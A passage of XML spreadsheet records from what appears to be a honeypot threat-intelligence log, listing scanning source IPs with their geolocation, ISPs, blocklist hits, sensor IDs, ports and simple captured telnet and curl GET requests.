    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;47416&amp;&amp;80&amp;&amp;42438&amp;&amp;42461&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1182"/>
    <s v="120.679"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="TINP"/>
    <s v="residential"/>
    <s v="Digital United Inc."/>
    <s v="2006-12-28"/>
    <s v="SEEDNET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bcd:7956"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3365"/>
    <x v="3365"/>
    <s v="NA&amp;&amp;114-33-143-114.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T09:46:07"/>
    <d v="2024-12-15T18:57:35"/>
    <d v="2025-04-03T09:46:07"/>
    <n v="247"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7221:8f72"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3366"/>
    <x v="3366"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:43:58"/>
    <d v="2024-04-25T00:27:41"/>
    <d v="2025-04-03T09:43:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="31779&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']}"/>
    <n v="37"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:e971"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3367"/>
    <x v="3367"/>
    <s v="122-117-104-99.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:42:05"/>
    <d v="2024-04-15T10:11:59"/>
    <d v="2025-04-03T09:42:05"/>
    <n v="436"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3296&amp;&amp;23&amp;&amp;7613&amp;&amp;2931&amp;&amp;NA&amp;&amp;47438&amp;&amp;9100&amp;&amp;80"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7a75:6863"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3368"/>
    <x v="3368"/>
    <s v="59-127-42-239.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:41:28"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T09:41:28"/>
    <n v="551"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;64012&amp;&amp;80&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7f:2aef"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3369"/>
    <x v="3369"/>
    <s v="220-133-177-156.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:39:16"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T09:39:16"/>
    <n v="486"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H6&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;34624&amp;&amp;23&amp;&amp;11114&amp;&amp;40757&amp;&amp;80&amp;&amp;53727&amp;&amp;53712&amp;&amp;NA&amp;&amp;9100&amp;&amp;36265"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:b19c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3370"/>
    <x v="3370"/>
    <s v="59-126-194-111.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:37:25"/>
    <d v="2024-04-15T16:45:15"/>
    <d v="2025-04-03T09:37:25"/>
    <n v="23320"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;45992&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:c26f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3371"/>
    <x v="3371"/>
    <s v="bb121-7-118-22.singnet.com.sg"/>
    <x v="0"/>
    <d v="2025-04-03T09:26:55"/>
    <d v="2025-04-03T09:26:55"/>
    <d v="2025-04-03T09:26:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29229"/>
    <s v="103.808"/>
    <s v="9506"/>
    <s v="SINGTEL-FIBRE"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="consumer"/>
    <s v="Singtel Fibre"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-06-14 16:00:00"/>
    <s v="2025-06-14 16:00:00"/>
    <s v="2024-07-14 16:02:49"/>
    <s v="['ns1.singnet.com.sg', 'ns2.singnet.com.sg']"/>
    <s v="Singnet Pte Ltd"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7907:7616"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3372"/>
    <x v="3372"/>
    <s v="NA&amp;&amp;125-229-44-63.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T09:26:25"/>
    <d v="2024-12-17T00:16:10"/>
    <d v="2025-04-03T09:26:25"/>
    <n v="394"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23&amp;&amp;80&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de5:2c3f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3373"/>
    <x v="3373"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:25:02"/>
    <d v="2025-04-03T01:56:33"/>
    <d v="2025-04-03T09:25:02"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:98ba"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3374"/>
    <x v="3374"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:18:49"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T09:18:49"/>
    <n v="566"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8878&amp;&amp;23&amp;&amp;13705&amp;&amp;51140&amp;&amp;36070&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;48711"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="4780"/>
    <s v="Digital United Inc."/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:e2cc"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3375"/>
    <x v="3375"/>
    <s v="114-35-9-14.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:18:42"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T09:18:42"/>
    <n v="234"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;12328&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7223:90e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3376"/>
    <x v="3376"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:18:03"/>
    <d v="2025-04-03T09:18:03"/>
    <d v="2025-04-03T09:18:03"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:7cf1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3377"/>
    <x v="3377"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:14:49"/>
    <d v="2024-09-11T20:36:00"/>
    <d v="2025-04-03T09:14:49"/>
    <n v="324"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
